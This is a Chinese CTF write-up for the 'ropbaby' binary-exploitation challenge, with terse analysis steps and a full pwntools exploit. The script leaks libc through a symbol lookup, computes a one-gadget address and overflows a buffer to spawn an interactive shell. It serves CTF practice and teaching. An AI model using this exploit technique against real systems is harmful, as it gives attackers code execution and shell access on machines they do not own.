1.实验吧_ropbaby(西普杯CTF)_onegadget
2019-05-26 15:22
543 查看
- 分析
1.先查看文件位数,安全机制
2.查看strings,调用函数(特别注意常见的函数) - 漏洞点
- EXP
from pwn import *
context.log_level = "debug"
p = process('./ropbaby')
p.recvuntil(': ')
p.sendline('2')
p.recvuntil('Enter symbol: ')
p.sendline('system')
a=p.recvline()
libc = a.split(': ')[-1]
lib=int(libc,16) - 0x45390
log.success('libc : %#x',lib)
onegadget =0x45216+lib
p.recvuntil(': ')
p.sendline('3')
p.recvuntil('(max 1024): ')
p.sendline('17')
p.sendline('a'*8 + p64(onegadget))
p.recvuntil(': ')
p.sendline('4') #让题目正常退出
p.interactive()
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 西普实验吧CTF-二叉树遍历
- 实验吧-CTF-简单的sql注入思路
- CTF 实验吧 头有点大
- CTF 实验吧 Forms
- CTF实验吧-WEB专题-4
- ctf入门——实验吧
- 实验吧之CTF---紧急报文
- 实验吧CTF题目之抓到你了(代号:1813)
- 实验吧 Zcrypt(ASIS CTF 2015) BY Assassin
- 实验吧CTF-web
- CTF-实验吧-雌黄出其唇吻
- CTF实验吧-WEB专题-6
- 实验吧CTF题库之二叉树遍历
- 西普实验吧CTF-杯酒人生
- 实验吧NSCTF crypto200:
- 实验吧-CTF题库-速度爆破
- Tamevic’s Ctf-Web writeup@实验吧‘这个看起来有点简单!’
- [CTF]No.0004 [实验吧]登陆一下好吗??
- CTF 实验吧 what a fuck!这是什么鬼东西
- 0ctf 2017 babyheap writeup